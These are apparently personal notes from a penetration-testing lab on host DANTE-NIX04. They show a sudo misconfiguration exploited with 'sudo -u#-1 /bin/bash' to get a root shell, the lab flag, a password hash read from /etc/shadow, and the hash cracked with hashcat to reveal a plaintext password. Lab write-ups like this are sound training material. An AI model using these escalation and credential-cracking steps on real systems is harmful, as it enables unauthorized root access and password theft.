ben@DANTE-NIX04:/tmp$ sudo -l
 
 
Matching Defaults entries for ben on DANTE-NIX04:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
 
User ben may run the following commands on DANTE-NIX04:
    (ALL, !root) /bin/bash

It means the user ben can run /bin/bash command as any other other than root. We know that there is a frank user there. So we can have a login as frank user here.

Priv Esc

 
ben@DANTE-NIX04:~$ sudo -l
Password:
Matching Defaults entries for ben on DANTE-NIX04:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
 
User ben may run the following commands on DANTE-NIX04:
    (ALL, !root) /bin/bash
ben@DANTE-NIX04:~$ sudo -u#-1 /bin/bash

Flag

Location: /root/flag.txt

DANTE{sudo_M4k3_me_@_Sandwich}

Julian is there why

cat /etc/shadow
julian:$1$CrackMe$U93HdchOpEUP9iUxGVIvq/:18439:0:99999:7:::

Cracking the hash

hashcat hash /usr/share/wordlists/rockyou.txt
hashcat hash --show
 
manchesterunited

Malleum Knowledge Base

Explorer

Post Initial Foothold

Priv Esc

Flag

Julian is there why

Cracking the hash

Graph View

Table of Contents

Backlinks